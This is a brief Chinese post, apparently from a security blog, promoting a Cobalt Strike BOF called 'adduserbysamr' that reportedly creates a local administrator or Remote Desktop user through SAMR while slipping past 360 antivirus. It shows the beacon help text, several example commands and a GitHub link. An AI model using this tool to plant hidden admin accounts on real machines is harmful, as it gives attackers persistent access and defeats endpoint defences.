Quan


WEB安全 内网安全 终端对抗 威胁情报
终端对抗
据说能过360添加用户的BOF


beacon> help adduserbysamr
Use: adduserbysamr [username] [password] [groupName]
e.g: adduserbysamr sysadmin p@ssw0rd
     adduserbysamr sysadmin p@ssw0rd Administrators
     adduserbysamr sysadmin p@ssw0rd "Remote Desktop Users"

Add a user to localgroup by samr, groupName is "Administrators" by default, do not use it at AD.
唯一的问题是,360会有痕迹


https://github.com/AgeloVito/adduserbysamr-bof